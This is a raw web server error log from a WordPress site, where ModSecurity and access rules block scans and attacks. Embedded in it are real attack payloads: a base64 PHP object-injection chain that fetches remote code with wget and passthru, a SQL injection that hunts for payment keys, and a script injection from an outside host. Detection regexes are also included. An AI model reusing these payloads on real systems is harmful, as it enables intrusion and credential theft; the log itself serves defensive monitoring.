investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jun 07 07:49:21.297222 2024] [:error] [pid 8413:tid 140081784362752] [client 20.64.170.252:37504] [client 20.64.170.252] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZmMB0Zv9nww7GA3X51WZngAAANI"], referer: www.google.com [Fri Jun 07 07:49:22.988151 2024] [:error] [pid 8413:tid 140081851504384] [client 20.64.170.252:37506] [client 20.64.170.252] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZmMB0pv9nww7GA3X51WZnwAAAMo"], referer: www.google.com 2024/06/07 18:04:10 [error] 8253#8253: *275395 access forbidden by rule, client: 179.43.188.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 08 05:50:13.096463 2024] [authz_core:error] [pid 26749:tid 140290249639680] [client 207.154.197.113:36550] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/08 05:50:16 [error] 26090#26090: *281155 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jun 08 05:50:17.009491 2024] [authz_core:error] [pid 26749:tid 140290325174016] [client 165.227.84.14:36570] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/08 05:50:19 [error] 26090#26090: *281174 access forbidden by rule, client: 165.227.84.14, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 08 07:55:57.100931 2024] [authz_core:error] [pid 26133:tid 140290325174016] [client 206.81.24.227:39840] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/08 07:56:01 [error] 26091#26091: *282722 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jun 08 10:40:19.793347 2024] [:error] [pid 26749:tid 140290241246976] [client 93.174.93.127:44666] [client 93.174.93.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:data. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 0OntpOjA7aTowO2k6MTthOjE6e2k6MDtzOjQxOiJ3Z2V0IGh0dHA6Ly9jdGEuaW1hc3luYy5jb20vd29yZHByZXNzLnBocCI7fWk6MjthOjE6e3M6MTE6IgAqAGNhbGxiYWNrIjtzOjg6InBhc3N0aHJ1Ijt9aTozO047fX0= found within ARGS:data: 123456:TzoxOToiV0NfTG9nX0hhbmRsZXJfRmlsZSI6MTp7czoxMDoiACoAaGFuZGxlcyI7TzozMzoiUmVxdWVzdHNfVXRpbGl0eV9GaWx0ZXJlZEl0ZXJhdG9yIjo0OntpOjA7aTowO2k6MTthOjE6e2k6MDtzOjQxOiJ3Z2V0IGh0dHA6Ly9jdGEuaW1hc3luYy5jb20vd29yZHByZXNzLnBocCI7fWk6MjthOjE6e3M6MTE6IgAqAGNhbGxiYWNrIjtzOjg6InBhc3N0aHJ1Ijt9aTozO047fX0="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6 [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZmR7Y0bBpfdTYsNQ32XloQAAANU"], referer: http://investigacionperu.com [Sat Jun 08 11:55:18.937296 2024] [authz_core:error] [pid 26749:tid 140290409101056] [client 159.65.18.197:47244] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/08 11:55:22 [error] 26090#26090: *286007 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/08 13:52:52 [error] 26090#26090: *287292 access forbidden by rule, client: 103.102.228.131, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 08 15:19:06.335454 2024] [:error] [pid 26134:tid 140290316781312] [client 23.162.200.130:52292] [client 23.162.200.130] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZmS8ujhhbDqIvumfcmpMpQAAAIw"] 2024/06/08 17:55:31 [error] 26090#26090: *289804 access forbidden by rule, client: 103.102.228.131, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/08 18:16:40 [error] 26090#26090: *290342 access forbidden by rule, client: 103.102.228.131, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/06/08 20:10:35 [error] 26091#26091: *291641 access forbidden by rule, client: 103.102.228.131, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/06/09 05:25:32 [error] 7839#7839: *299092 access forbidden by rule, client: 103.102.228.131, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/06/09 06:54:48 [error] 7839#7839: *299823 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jun 09 09:26:24.728729 2024] [autoindex:error] [pid 8764:tid 140197371004672] [client 206.189.128.212:52918] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jun 09 12:45:07.030226 2024] [:error] [pid 7879:tid 140197438146304] [client 176.109.190.121:58478] [client 176.109.190.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at REQUEST_COOKIES:WP_SESSION_COOKIE. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within REQUEST_COOKIES:WP_SESSION_COOKIE: 8841e914268ba2232b0b796471417823||1717930039||1717929679"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZmXqI2-gD-YnSspaL-WBnwAAAEQ"], referer: https://www.retpc.jp//blog//wp-login.php [Sun Jun 09 19:23:26.380542 2024] [:error] [pid 7878:tid 140197412968192] [client 5.188.62.140:39430] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmZHfsVFvcwASfzV29oBZgAAAAc"] [Mon Jun 10 02:51:38.970415 2024] [:error] [pid 8764:tid 140197320648448] [client 50.31.176.50:50248] [client 50.31.176.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_value%20like%20%27%25pk_live%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZmawiusPPNvrCJ3qVRPBpAAAANI"] 2024/06/10 04:27:12 [error] 18998#18998: *311662 access forbidden by rule, client: 83.147.52.37, server: cpanel.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Jun 10 09:23:44.973817 2024] [authz_core:error] [pid 19038:tid 139709976143616] [client 159.89.127.165:60034] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Mon Jun 10 09:23:48.177766 2024] [authz_core:error] [pid 19662:tid 139709883823872] [client 164.92.107.174:60084] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/10 09:23:49 [error] 18998#18998: *314457 access forbidden by rule, client: 159.89.127.165, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/10 09:23:52 [error] 18999#18999: *314470 access forbidden by rule, client: 164.92.107.174, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jun 10 09:37:47.619035 2024] [authz_core:error] [pid 19037:tid 139709976143616] [client 96.126.110.181:60562] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/10 09:37:50 [error] 18998#18998: *314683 access forbidden by rule, client: 96.126.110.181, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jun 10 10:25:32.523967 2024] [:error] [pid 19038:tid 139709967750912] [client 111.229.168.179:33962] [client 111.229.168.179] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zmca7Jg4XptqkTWNJyQRNAAAAIk"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:25:32.524058 2024] [:error] [pid 19038:tid 139709967750912] [client 111.229.168.179:33962] [client 111.229.168.179] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zmca7Jg4XptqkTWNJyQRNAAAAIk"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:25:54.597344 2024] [:error] [pid 19038:tid 139709934180096] [client 111.229.168.179:33968] [client 111.229.168.179] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmcbApg4XptqkTWNJyQRNQAAAI0"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:25:54.597461 2024] [:error] [pid 19038:tid 139709934180096] [client 111.229.168.179:33968] [client 111.229.168.179] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmcbApg4XptqkTWNJyQRNQAAAI0"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:57:47.718730 2024] [:error] [pid 19662:tid 139710105171712] [client 111.229.168.179:34856] [client 111.229.168.179] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zmcie5eP-FYJWKJncPlw3AAAAME"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:57:47.718811 2024] [:error] [pid 19662:tid 139710105171712] [client 111.229.168.179:34856] [client 111.229.168.179] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zmcie5eP-FYJWKJncPlw3AAAAME"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:57:49.025233 2024] [:error] [pid 19662:tid 139710088386304] [client 111.229.168.179:34858] [client 111.229.168.179] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmcifZeP-FYJWKJncPlw3QAAAMM"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 10:57:49.025305 2024] [:error] [pid 19662:tid 139710088386304] [client 111.229.168.179:34858] [client 111.229.168.179] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmcifZeP-FYJWKJncPlw3QAAAMM"], referer: https://investigacionperu.com/xmlrpc.php [Mon Jun 10 13:04:39.351119 2024] [authz_core:error] [pid 19036:tid 139709900609280] [client 139.162.155.225:38174] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/10 13:04:43 [error] 18999#18999: *316926 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jun 10 13:11:01.881606 2024] [:error] [pid 19036:tid 139709976143616] [client 93.174.93.127:38330] [client 93.174.93.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:data. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 0OntpOjA7aTowO2k6MTthOjE6e2k6MDtzOjQxOiJ3Z2V0IGh0dHA6Ly9jdGEuaW1hc3luYy5jb20vd29yZHByZXNzLnBocCI7fWk6MjthOjE6e3M6MTE6IgAqAGNhbGxiYWNrIjtzOjg6InBhc3N0aHJ1Ijt9aTozO047fX0= found within ARGS:data: 123456:TzoxOToiV0NfTG9nX0hhbmRsZXJfRmlsZSI6MTp7czoxMDoiACoAaGFuZGxlcyI7TzozMzoiUmVxdWVzdHNfVXRpbGl0eV9GaWx0ZXJlZEl0ZXJhdG9yIjo0OntpOjA7aTowO2k6MTthOjE6e2k6MDtzOjQxOiJ3Z2V0IGh0dHA6Ly9jdGEuaW1hc3luYy5jb20vd29yZHByZXNzLnBocCI7fWk6MjthOjE6e3M6MTE6IgAqAGNhbGxiYWNrIjtzOjg6InBhc3N0aHJ1Ijt9aTozO047fX0="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6 [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZmdBtftryslnBzH4YetKTQAAAAg"], referer: https://investigacionperu.com [Mon Jun 10 14:16:37.839978 2024] [:error] [pid 19037:tid 139709900609280] [client 5.188.62.140:40882] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmdRFWMlsv5UV5bwjyU5xgAAAFE"] 2024/06/11 05:29:35 [error] 12207#12207: *328611 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jun 11 06:09:00.876704 2024] [:error] [pid 12966:tid 140437058656000] [client 179.43.191.18:39774] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZmgwTEnv9000xWeS-VvutAAAANc"], referer: https://investigacionperu.com 2024/06/11 09:36:00 [error] 12206#12206: *330976 access forbidden by rule, client: 185.156.72.30, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/11 10:05:45 [error] 12207#12207: *331213 access forbidden by rule, client: 83.147.52.37, server: webmail.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Jun 11 14:47:18.556985 2024] [:error] [pid 12966:tid 140437243295488] [client 51.15.184.67:56522] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zmipxknv9000xWeS-VvzRwAAAME"], referer: www.google.com [Tue Jun 11 14:47:25.171399 2024] [:error] [pid 12966:tid 140437125797632] [client 51.15.184.67:56524] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZmipzUnv9000xWeS-VvzSAAAAM8"], referer: www.google.com [Tue Jun 11 16:17:46.042014 2024] [autoindex:error] [pid 12966:tid 140437083834112] [client 4.242.216.5:59264] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 12 07:17:18.886491 2024] [authz_core:error] [pid 24164:tid 139748119090944] [client 46.101.111.185:34870] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/12 07:17:22 [error] 23408#23408: *349419 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jun 12 11:49:08.124761 2024] [authz_core:error] [pid 24164:tid 139748152661760] [client 167.172.232.142:39978] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/12 11:49:10 [error] 23408#23408: *352437 access forbidden by rule, client: 167.172.232.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jun 12 11:56:37.964842 2024] [authz_core:error] [pid 23548:tid 139748110698240] [client 165.227.173.41:40158] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/12 11:56:41 [error] 23409#23409: *352546 access forbidden by rule, client: 165.227.173.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jun 12 11:56:42.575206 2024] [authz_core:error] [pid 23550:tid 139748194625280] [client 207.154.197.113:40178] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/12 11:56:45 [error] 23409#23409: *352565 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jun 12 21:07:34.816842 2024] [autoindex:error] [pid 24164:tid 139748186232576] [client 52.140.98.217:47986] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 12 21:40:51.955308 2024] [:error] [pid 24164:tid 139748110698240] [client 176.96.138.154:48778] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jun 12 21:41:16.237085 2024] [:error] [pid 23550:tid 139748068734720] [client 176.96.138.154:48814] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jun 12 21:41:16.484885 2024] [:error] [pid 23550:tid 139748152661760] [client 176.96.138.154:48816] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jun 12 21:42:00.970404 2024] [autoindex:error] [pid 24164:tid 139748068734720] [client 176.96.138.154:48920] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 12 21:42:10.450376 2024] [:error] [pid 23550:tid 139748093912832] [client 176.96.138.154:48944] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jun 12 21:42:11.346124 2024] 